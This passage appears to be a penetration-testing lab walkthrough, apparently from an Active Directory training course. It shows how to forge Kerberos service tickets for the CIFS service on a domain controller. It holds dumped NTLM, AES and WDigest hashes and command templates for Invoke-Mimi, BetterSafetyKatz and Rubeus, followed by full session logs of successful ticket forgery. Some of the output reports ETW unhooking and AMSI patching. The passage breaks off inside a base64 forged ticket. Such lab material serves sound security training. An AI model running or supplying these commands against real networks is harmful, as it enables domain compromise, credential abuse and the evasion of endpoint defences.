ntlm- 7: 0815b43c065b92dfcc497f0beef12480
ntlm- 8: 915a88647de381e31663e5e4a0939cab
ntlm- 9: 83471b07629c4a77e5514d9754f6b853
ntlm-10: 77f9b24843b43c08b1a4f6a3bb849b56
ntlm-11: 3b08222797d52a17c3fe48b370cfc8e1
ntlm-12: 1be12164a06b817e834eb437dc8f581c
ntlm-13: 402fa2cfac3e58e2187a056b204d85c5
lm - 0: 6edc90a98eddcb7f8cbc84e99fc7c7b2
 lm - 1: 770e2b1cc0f3023071bd0cc25474dc45
lm - 2: ebd5e7a03617e70c4285fe02fa19196b
lm - 3: 6e5c83c3f7bce54b14a22c7d55d53e77
lm - 4: ab0ad690289b0828e4c383da97074d8b
lm - 5: 3cac6fedb3d669f135cc90a125b98b2f
lm - 6: 991731e6ea4b347f2632d3f07d8acdc8
lm - 7: 6371f513ba9715e58bfeffbc359c1a3b
lm - 8: f2c40894920c9a9b7a80833ddceb09c5
lm - 9: de285ec79e2dc18afcb3c8811525ca06
lm -10: 1648476dfad706be7309b3c9915e2b44
lm -11: a378c9eae5ac902ebb2c0782fa44ba39
lm -12: 26d1d448abbbcd2cadcfaf4c7c1e0ada

Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
Default Salt : DOLLARCORP.MONEYCORP.LOCALhostdcorp-dc.dollarcorp.moneycorp.local
Default Iterations : 4096
Credentials
aes256_hmac (4096) : e4a24a0b2f58786711c6f8a983bf5a1e00eaf160fcdc2b4225825711b99cf5af
aes128_hmac (4096) : 58d5e06f54d9304b1f59a439bd09ad32
des_cbc_md5 (4096) : f2eac7583ef7ab3d
OldCredentials
aes256_hmac (4096) : 2b2945ed11f042b333128ab628bb9b98308e11e67284d45575adcabd99010af1
aes128_hmac (4096) : 109e8cf66e910bfa8ee723280b2ca82a
des_cbc_md5 (4096) : d0320ea8c104cbb6
OlderCredentials
aes256_hmac (4096) : cc7aedfa48a39e7dd1a56f05e0ef4dba84fc87b77a975b96eb35d7cc0ebafe3a
aes128_hmac (4096) : 6506078bdd0829205d3b1685f8413aa3
des_cbc_md5 (4096) : b526f41ab5b95113

* Primary:Kerberos *
Default Salt : DOLLARCORP.MONEYCORP.LOCALhostdcorp-dc.dollarcorp.moneycorp.local
Credentials
des_cbc_md5 : f2eac7583ef7ab3d
OldCredentials
des_cbc_md5 : d0320ea8c104cbb6

* Packages *
NTLM-Strong-NTOWF

* Primary:WDigest *
01 f4e7331529928e6fb8a82e329a1b4894
02 318e0692ca4101f7f6b7b02275574ce1
03 f4e7331529928e6fb8a82e329a1b4894
04 f4e7331529928e6fb8a82e329a1b4894
05 2a7b5cff35dececde3a0753afc1b4b59
06 2a7b5cff35dececde3a0753afc1b4b59
07 3e8c4a0ae5b6634990ee44a45ec99d42
08 ce26b8eb950d751d0b0c6122cb51b311
09 ec07e00e7f013a8fccf65f38dd2cdd3f
10 a7f728c73ec9e0baf34def6752a9a074
11 a7f728c73ec9e0baf34def6752a9a074
12 ce26b8eb950d751d0b0c6122cb51b311
13 ce26b8eb950d751d0b0c6122cb51b311
14 6b5fc76f28d2d3cff7e3559db1162ed8
15 8ac89af4d8cf507b0a3bcc089b28fcc0
16 0a5229165a63f3e0b36350d292f64410
17 45a2d57dfdaf5743e6140e6b71a00c35
18 cc8d8cf2181b5be7ce9bffa3741469ec
 19 0eafb60769530a2cda33aa1d68dc25f8
20 cc8d8cf2181b5be7ce9bffa3741469ec
21 d44585773bcdc2f48c18acf082b6fe5f
22 9ef9c949b0f813719f62b124458ff10f
23 d44585773bcdc2f48c18acf082b6fe5f
24 037f9dfb2cc3d2d0cbc4caf630d38a2c
25 9e34364d3774106ce2d7841596c0e50a
26 7e26ba1ef8fa2f8103851a4e6d514e63
27 5596afaa8f1db4e791058a00bb171e8c
28 35b8c73ed3392c24f5fe14212a0346b4
29 5596afaa8f1db4e791058a00bb171e8c

mimikatz(commandline) # exit
Bye!

NTLM Hash - 81a9ccc2f44b988af78448ad78297ad5

AES Hash - e4a24a0b2f58786711c6f8a983bf5a1e00eaf160fcdc2b4225825711b99cf5af

Execution
We will access the CIFS service on the domain controller. File System service (CIFS service), which would
provide access to all files stored on the computer. Microsoft describes other services that run on Windows
operating systems here.

Using Invoke-Mimi
AES hash
Invoke-Mimi -Command '"kerberos::golden /User:<user to impersonate> /domain:<Domain> /sid:<Domain
SID> /target:<target machine containing the service> /service:<service> /aes256:<hash of the
service account> /startoffset:0 /endin:<Ticketlifetime> /renewmax:<Renewaltime> /ptt"'

C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> . C:\Ad\Tools\Invoke-MimiEx.ps1
PS C:\Windows\system32> . C:\Ad\Tools\PowerView.ps1
PS C:\Windows\system32> Get-DomainSID
S-1-5-21-719815819-3726368948-3917688648
PS C:\Windows\system32> (Get-DomainPolicyData).KerberosPolicy

MaxTicketAge : 10
MaxRenewAge : 7
MaxServiceAge : 600
MaxClockSkew : 5
TicketValidateClient : 1
PS C:\Windows\system32> ls \\dcorp-dc.dollarcorp.moneycorp.local\C$\
ls : Access is denied
At line:1 char:1
+ ls \\dcorp-dc.dollarcorp.moneycorp.local\C$\
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (\\dcorp-dc.doll...ycorp.local\C$\:String) [Get-
ChildItem], Unauthoriz
edAccessException
+ FullyQualifiedErrorId :
ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand

ls : Cannot find path '\\dcorp-dc.dollarcorp.moneycorp.local\C$\' because it does not exist.

At line:1 char:1
+ ls \\dcorp-dc.dollarcorp.moneycorp.local\C$\
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (\\dcorp-dc.doll...ycorp.local\C$\:String) [Get-
ChildItem], ItemNotFound
Exception
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand
PS C:\Windows\system32> Invoke-Mimi -Command '"kerberos::golden /User:administrator
/domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-
dc.dollarcorp.moneycorp.local /service:CIFS
/aes256:e4a24a0b2f58786711c6f8a983bf5a1e00eaf160fcdc2b4225825711b99cf5af /startoffset:0
/endin:600 /renewmax:10080 /ptt"'

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # kerberos::golden /User:administrator /domain:dollarcorp.moneycorp.local

/sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local
/service:CIFS /aes256:e4a24a0b2f58786711c6f8a983bf5a1e00eaf160fcdc2b4225825711b99cf5af
/startoffset:0 /endin:600 /renewmax:10080 /ptt
User : administrator
Domain : dollarcorp.moneycorp.local (DOLLARCORP)
SID : S-1-5-21-719815819-3726368948-3917688648
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: e4a24a0b2f58786711c6f8a983bf5a1e00eaf160fcdc2b4225825711b99cf5af - aes256_hmac
Service : CIFS
Target : dcorp-dc.dollarcorp.moneycorp.local
Lifetime : 6/28/2024 7:10:45 AM ; 6/28/2024 5:10:45 PM ; 7/5/2024 7:10:45 AM
-> Ticket : ** Pass The Ticket **

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Golden ticket for 'administrator @ dollarcorp.moneycorp.local' successfully submitted for current

session
PS C:\Windows\system32> klist

Current LogonId is 0:0x3b08b7

Cached Tickets: (1)

#0> Client: administrator @ dollarcorp.moneycorp.local

Server: CIFS/dcorp-dc.dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 6/28/2024 7:10:45 (local)
End Time: 6/28/2024 17:10:45 (local)
Renew Time: 7/5/2024 7:10:45 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:
PS C:\Windows\system32> ls \\dcorp-dc.dollarcorp.moneycorp.local\C$\

Directory: \\dcorp-dc.dollarcorp.moneycorp.local\C$

Mode LastWriteTime Length Name

---- ------------- ------ ----
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 11/14/2022 10:12 PM Program Files
d----- 5/8/2021 2:40 AM Program Files (x86)
d-r--- 5/18/2024 1:32 AM Users
d----- 1/10/2024 12:59 AM Windows

NTLM Hash
Invoke-Mimi -Command '"kerberos::golden /User:<user to impersonate> /domain:<Domain> /sid:<Domain
SID> /target:<target machine containing the service> /service:<service> /rc4:<hash of the service
account> /startoffset:0 /endin:<Ticketlifetime> /renewmax:<Renewaltime> /ptt"'

C:\Windows\system32>C:\AD\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\system32> ls \\dcorp-dc.dollarcorp.moneycorp.local\C$\
ls : Access is denied
At line:1 char:1
+ ls \\dcorp-dc.dollarcorp.moneycorp.local\C$\
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (\\dcorp-dc.doll...ycorp.local\C$\:String) [Get-
ChildItem], Unauthoriz
edAccessException
 + FullyQualifiedErrorId :
ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand

ls : Cannot find path '\\dcorp-dc.dollarcorp.moneycorp.local\C$\' because it does not exist.

At line:1 char:1
+ ls \\dcorp-dc.dollarcorp.moneycorp.local\C$\
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (\\dcorp-dc.doll...ycorp.local\C$\:String) [Get-
ChildItem], ItemNotFound
Exception
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand
PS C:\Windows\system32> . C:\Ad\Tools\Invoke-MimiEx.ps1
PS C:\Windows\system32> Invoke-Mimi -Command '"kerberos::golden /User:administrator
/domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-
dc.dollarcorp.moneycorp.local /service:cifs /rc4:81a9ccc2f44b988af78448ad78297ad5 /startoffset:0
/endin:600 /renewmax:10080 /ptt"'

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # kerberos::golden /User:administrator /domain:dollarcorp.moneycorp.local

/sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local
/service:cifs /rc4:81a9ccc2f44b988af78448ad78297ad5 /startoffset:0 /endin:600 /renewmax:10080
/ptt
User : administrator
Domain : dollarcorp.moneycorp.local (DOLLARCORP)
SID : S-1-5-21-719815819-3726368948-3917688648
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 81a9ccc2f44b988af78448ad78297ad5 - rc4_hmac_nt
Service : cifs
Target : dcorp-dc.dollarcorp.moneycorp.local
Lifetime : 6/28/2024 7:43:40 AM ; 6/28/2024 5:43:40 PM ; 7/5/2024 7:43:40 AM
-> Ticket : ** Pass The Ticket **

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Golden ticket for 'administrator @ dollarcorp.moneycorp.local' successfully submitted for current

session

PS C:\Windows\system32> klist

Current LogonId is 0:0x466574

Cached Tickets: (1)

#0> Client: administrator @ dollarcorp.moneycorp.local

Server: cifs/dcorp-dc.dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 6/28/2024 7:43:40 (local)
 End Time: 6/28/2024 17:43:40 (local)
Renew Time: 7/5/2024 7:43:40 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0
Kdc Called:

PS C:\Windows\system32> ls \\dcorp-dc.dollarcorp.moneycorp.local\C$\

Directory: \\dcorp-dc.dollarcorp.moneycorp.local\C$

Mode LastWriteTime Length Name

---- ------------- ------ ----
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 11/14/2022 10:12 PM Program Files
d----- 5/8/2021 2:40 AM Program Files (x86)
d-r--- 5/18/2024 1:32 AM Users
d----- 1/10/2024 12:59 AM Windows

Using BetterSafetyKatz
AES Hash
BetterSafetyKatz.exe "kerberos::golden /User:<user to impersonate> /domain:<Domain> /sid:<Domain
SID> /target:<target machine containing the service> /service:<service> /aes256:<hash of the
service account> /startoffset:0 /endin:<Ticketlifetime> /renewmax:<Renewaltime> /ptt" "exit"

C:\Windows\system32>dir \\dcorp-dc.dollarcorp.moneycorp.local\C$\
Access is denied.

C:\Windows\system32>C:\Ad\Tools\Loader.exe -Path C:\Ad\Tools\Old_Tools\BetterSafetyKatz.exe

"kerberos::golden /User:administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-
3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:CIFS
/aes256:e4a24a0b2f58786711c6f8a983bf5a1e00eaf160fcdc2b4225825711b99cf5af /startoffset:0
/endin:600 /renewmax:10080 /ptt" "exit"
[+] Successfully unhooked ETW!
[+] Successfully patched AMSI!
[+] URL/PATH : C:\Ad\Tools\Old_Tools\BetterSafetyKatz.exe Arguments :
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and
@Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # -Path
ERROR mimikatz_doLocal ; "-Path" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)
 exit - Quit mimikatz
cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # C:\Ad\Tools\Old_Tools\BetterSafetyKatz.exe
ERROR mimikatz_doLocal ; "C:\Ad\Tools\Old_Tools\BetterSafetyKatz.exe" command of "standard"
module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz

cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # kerberos::golden /User:administrator /domain:dollarcorp.moneycorp.local

/sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local
/service:CIFS /aes256:e4a24a0b2f58786711c6f8a983bf5a1e00eaf160fcdc2b4225825711b99cf5af
/startoffset:0 /endin:600 /renewmax:10080 /ptt
User : administrator
Domain : dollarcorp.moneycorp.local (DOLLARCORP)
SID : S-1-5-21-719815819-3726368948-3917688648
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: e4a24a0b2f58786711c6f8a983bf5a1e00eaf160fcdc2b4225825711b99cf5af - aes256_hmac
Service : CIFS
Target : dcorp-dc.dollarcorp.moneycorp.local
Lifetime : 6/28/2024 7:31:58 AM ; 6/28/2024 5:31:58 PM ; 7/5/2024 7:31:58 AM
-> Ticket : ** Pass The Ticket **

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Golden ticket for 'administrator @ dollarcorp.moneycorp.local' successfully submitted for current

session

mimikatz(commandline) # exit
Bye!
C:\Windows\system32>dir \\dcorp-dc.dollarcorp.moneycorp.local\C$\
Volume in drive \\dcorp-dc.dollarcorp.moneycorp.local\C$ has no label.
Volume Serial Number is 1A5A-FDE2

Directory of \\dcorp-dc.dollarcorp.moneycorp.local\C$

05/08/2021 01:20 AM <DIR> PerfLogs

11/14/2022 11:12 PM <DIR> Program Files
05/08/2021 02:40 AM <DIR> Program Files (x86)
05/18/2024 01:32 AM <DIR> Users
01/10/2024 01:59 AM <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 6,415,802,368 bytes free

NTLM Hash
BetterSafetyKatz.exe "kerberos::golden /User:<user to impersonate> /domain:<Domain> /sid:<Domain
SID> /target:<target machine containing the service> /service:<service> /rc4:<hash of the service
account> /startoffset:0 /endin:<Ticketlifetime> /renewmax:<Renewaltime> /ptt" "exit"

C:\Windows\system32>dir \\dcorp-dc.dollarcorp.moneycorp.local\C$\
Access is denied.

C:\Windows\system32>C:\Ad\Tools\Loader.exe -Path C:\Ad\Tools\Old_Tools\BetterSafetyKatz.exe

"kerberos::golden /User:administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-
3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:CIFS
/rc4:81a9ccc2f44b988af78448ad78297ad5 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
[+] Successfully unhooked ETW!
[+] Successfully patched AMSI!
[+] URL/PATH : C:\Ad\Tools\Old_Tools\BetterSafetyKatz.exe Arguments :
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and
@Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # -Path
ERROR mimikatz_doLocal ; "-Path" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz

cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
 cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # C:\Ad\Tools\Old_Tools\BetterSafetyKatz.exe
ERROR mimikatz_doLocal ; "C:\Ad\Tools\Old_Tools\BetterSafetyKatz.exe" command of "standard"
module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz

cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # kerberos::golden /User:administrator /domain:dollarcorp.moneycorp.local

/sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local
/service:CIFS /rc4:81a9ccc2f44b988af78448ad78297ad5 /startoffset:0 /endin:600 /renewmax:10080
/ptt
User : administrator
Domain : dollarcorp.moneycorp.local (DOLLARCORP)
SID : S-1-5-21-719815819-3726368948-3917688648
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 81a9ccc2f44b988af78448ad78297ad5 - rc4_hmac_nt
Service : CIFS
Target : dcorp-dc.dollarcorp.moneycorp.local
Lifetime : 6/28/2024 7:53:39 AM ; 6/28/2024 5:53:39 PM ; 7/5/2024 7:53:39 AM
-> Ticket : ** Pass The Ticket **

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Golden ticket for 'administrator @ dollarcorp.moneycorp.local' successfully submitted for current

session

mimikatz(commandline) # exit
Bye!

C:\Windows\system32>klist

Current LogonId is 0:0x4bc7e9

Cached Tickets: (1)

#0> Client: administrator @ dollarcorp.moneycorp.local

Server: CIFS/dcorp-dc.dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
 KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 6/28/2024 7:53:39 (local)
End Time: 6/28/2024 17:53:39 (local)
Renew Time: 7/5/2024 7:53:39 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0
Kdc Called:

C:\Windows\system32>dir \\dcorp-dc.dollarcorp.moneycorp.local\C$\
Volume in drive \\dcorp-dc.dollarcorp.moneycorp.local\C$ has no label.
Volume Serial Number is 1A5A-FDE2

Directory of \\dcorp-dc.dollarcorp.moneycorp.local\C$

05/08/2021 01:20 AM <DIR> PerfLogs

11/14/2022 11:12 PM <DIR> Program Files
05/08/2021 02:40 AM <DIR> Program Files (x86)
05/18/2024 01:32 AM <DIR> Users
01/10/2024 01:59 AM <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 6,414,053,376 bytes free
Using Rubeus
AES Hash
Rubeus.exe silver /service:<service>/<Hostname> /aes256:<aes keys> /sid:<DomainSID> /ldap
/user:<User to Impersonate /domain:<Domain> /ptt

C:\Windows\system32>dir \\dcorp-dc.dollarcorp.moneycorp.local\C$
Access is denied.

C:\Windows\system32>C:\AD\Tools\Rubeus.exe silver /service:CIFS/dcorp-

dc.dollarcorp.moneycorp.local
/aes256:e4a24a0b2f58786711c6f8a983bf5a1e00eaf160fcdc2b4225825711b99cf5af /sid:S-1-5-21-719815819-
3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Build TGS

[*] Trying to query LDAP using LDAPS for user information on domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(samaccountname=Administrator)'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group
Policy Creator Owners,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain
Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN=Built
in,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-719815819-3726368948-3917688648-
513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[*] \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL successfully mounted
[*] Attempting to unmount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[*] \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL successfully unmounted
[*] Attempting to mount: \\us.dollarcorp.moneycorp.local\SYSVOL
[*] \\us.dollarcorp.moneycorp.local\SYSVOL successfully mounted
[*] Attempting to unmount: \\us.dollarcorp.moneycorp.local\SYSVOL
[*] \\us.dollarcorp.moneycorp.local\SYSVOL successfully unmounted
[*] Retrieving netbios name information over LDAP from domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for
'(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Retrieving group information over LDAP from domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group
Policy Creator
Owners,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain
Admins,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN
=Builtin,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-1028785420-4100948154-
1806204659-513))'
[*] Retrieving netbios name information over LDAP from domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for
'(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Building PAC

[*] Domain : DOLLARCORP.MONEYCORP.LOCAL (dcorp)

[*] SID : S-1-5-21-719815819-3726368948-3917688648
[*] UserId : 500
[*] Groups : 544,512,520,513
[*] ServiceKey : E4A24A0B2F58786711C6F8A983BF5A1E00EAF160FCDC2B4225825711B99CF5AF
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey : E4A24A0B2F58786711C6F8A983BF5A1E00EAF160FCDC2B4225825711B99CF5AF
[*] KDCKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service : CIFS
[*] Target : dcorp-dc.dollarcorp.moneycorp.local

[*] Generating EncTicketPart

[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGS for 'Administrator' to 'CIFS/dcorp-dc.dollarcorp.moneycorp.local'

[*] AuthTime : 6/28/2024 8:53:15 AM

[*] StartTime : 6/28/2024 8:53:15 AM
[*] EndTime : 6/28/2024 6:53:15 PM
[*] RenewTill : 7/5/2024 8:53:15 AM

[*] base64(ticket.kirbi):

doIGKjCCBiagAwIBBaEDAgEWooIE3TCCBNlhggTVMIIE0aADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMojYwNKADAgECoS0wKxsEQ0lGUxsjZGNvcnAtZGMuZG9sbGFyY29ycC5tb25leWNvcnAu
bG9jYWyjggRyMIIEbqADAgESoQMCAQOiggRgBIIEXExJ5+lcK8sdaG1M8b7FT48dBLgHeWzlOofBjba+
tCON+9O6MrAgSswSDMAVIfzwDhle3GgxuorFrpbyNeVuHMD8sST7GnEb6jeCEUtaR+sBBnWUG9Q7eF20
FacPhrYDTnP+emTHLyyFRuKnjTSKy+bhciA1Lcs+7wnoGUrIRyJahNGqHh3iKRz6DF3+UpSA3KL6XsfR
m/CQMt0wqDec9+FvwFR65ipFHBoQoekJptiBwLN1FiGOyccCRUcyWLeqC5Gjmn1aFCa63Kbom4FygUza
YqgRx6EBex6QLGbjyi++eVvutvia6UAbZT693QDxR4CT/Y0fkxQqV6apfxQnhP3pCWDJw5vuAu0ow3e3
uEwPwT3xOfB7hzdcZ4ROVA5N91o/0wSHHGSvwiRil3M1f4Mf1P6OXkwiOxTE+nwdh42A+hwbAEuWGRJO
Dd4SGekE1xn6rQr6QXSPxu0QsVWqxPIVePq0lU6kAyrqlzJa5Vc2lW9xsfHYnCoey+iXOOjKWDGwVOKO
 gmV1EcrqdSLt2BDMApfa0wUn185d0NGn7kkuu4PJ3Uvl6OdaBhDwkR2aWrFMGFJflvNKoyoD/RRCQ1Fq
